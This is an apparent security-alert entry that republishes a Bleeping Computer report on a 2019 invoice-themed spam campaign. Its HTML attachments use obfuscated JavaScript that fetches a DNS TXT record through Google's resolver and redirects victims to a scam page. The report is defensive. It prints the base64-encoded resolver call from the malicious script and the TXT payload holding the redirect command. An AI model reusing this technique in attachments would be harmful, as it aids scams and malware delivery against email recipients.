#1263023: New Spam Campaign Controlled by Attackers via DNS TXT Records

Description: A new finance spam campaign with HTML attachments has been discovered that utilizes Google's public DNS resolver to retrieve JavaScript commands embedded in a domain's TXT record. These commands will then redirect a user's browser to a aggressive trading advertisement site, which has been reported as a scam.

According to MyOnlineSecurity.com, who discovered this campaign, it is being targeted at people in the United Kingdom and the associated IP addresses have previously been utilized by the Necurs botnet.
The spam campaign

These spam emails will have the subject line of "Delivery [number]", such as "Delivery 0802", and will state that an invoice for a recent purchase is attached. This attachment is an HTML file with names like "invoic-B075.html".

Scam Email
Scam Email

When these HTML attachments are opened, it will redirect UK users to a reported Tesler 2 trading scam at the URL https://appteslerapp.com/. This page states that you can "earn up $237 per hour" by testing software for 5 minutes.
Scam Landing Page
Scam Landing Page

Users outside of the UK, will be shown blank pages or pages that show a loading message.
Using DNS TXT records to redirect users

While it is important to be aware of a scam in order to avoid it, the interesting part of this campaign is how the attackers use DNS TXT records to tell an HTML attachment to what page a user should be redirected.

When looking at the source code of the HTML attachments we can see an obfuscated JavaScript script. This JavaScript is triggered by a request to https://accounts.google.com/o/oauth2/revoke?callback=ccc(), which will fail, and cause the ccc() function of the malicious script to be triggered.
HTML attachment source
HTML attachment source

As you can see from the image above, this script contains a base64 encoded URL.

var v = window.atob("aHR0cHM6Ly9kbnMuZ29vZ2xlLmNvbS9yZXNvbHZlP25hbWU9ZmV0Y2gudnhwYXB1Yi5vdXJtYXpkY29tcGFueS5uZXQmdHlwZT1UWFQ=");

When decoded, this string is an URL to Google's public DNS resolve for a particular domain. For example, the above string decodes to https://dns.google.com/resolve?name=fetch.vxpapub.ourmazdcompany.net&type=TXT.

The attachment's script will use this URL to retrieve the associated domain's TXT record.

A TXT record is a DNS entry that can be used to store textual data. This field is typically used for SPF or DMARC records, but could be used to host any type of textual content.

The nice part about using the Google's DNS resolver is that the information will be returned as JSON, which makes it easy for the malicious script to extract the data it needs.

In this particular case, the script will extract the data found in the TXT record, which contain a window.location.replace JavaScript command. This command is then appended to the open HTML page, which will cause the browser to be redirect to the spam page.

{
"Status":0,
"TC":false,
"RD":true,
"RA":true,
"AD":false,
"CD":false,
"Question":[
{
"name":"fetch.vxpapub.ourmazdcompany.net.",
"type":16
}
],
"Answer":[
{
"name":"fetch.vxpapub.ourmazdcompany.net.",
"type":16,
"TTL":119,
"data":"\"window.location.replace(\"http://www.92458bfg36abp.euxjouernui.icu/52388.html\");\""
}
],
"Comment":"Response from ns1.firstdnshoster.com.(104.193.252.177)."
}

Each time you refresh the dns.google.com URL, a different redirect URL will be given.

By querying a domain's TXT record to determine what page a user should be redirected to allows the attackers to easily switch out campaigns. For example, if one campaign is not working, they could easily switch it out for another one that may install malware instead.

As always, be careful of emails containing attachments that pretend to be invoices. In most cases, unless you know who sent them, they will either be scams or malicious documents that will infect you with malware.
First Aid: These spam emails will have the subject line of "Delivery [number]", such as "Delivery 0802", and will state that an invoice for a recent purchase is attached. This attachment is an HTML file with names like "invoic-B075.html".
More info: https://www.bleepingcomputer.com/news/security/new-spam-campaign-controlled-by-attackers-via-dns-txt-records/

Date added June 11, 2019, 11:48 a.m.
Source Bleeping Computer
Subjects
  • All New Malware or Attack Alerts - New Reports / IOCs in
  • BIND / DNS / Name / DHCP Servers - Various
  • DNS, BIND and ARP based Attacks
  • DNS/Domain Hijacking
  • DNS / Domain Shadowing
  • DNSMessenger Attack
  • DNS / Name General vulnerabilities
  • DNS / Name Servers - Various
  • DNS Poisoning / DNS Cache Poisoning / DNS Spoofing / IP Spoofing
  • DNS Rebinding Attack
  • Necurs Rootkit/Trojan/Botnet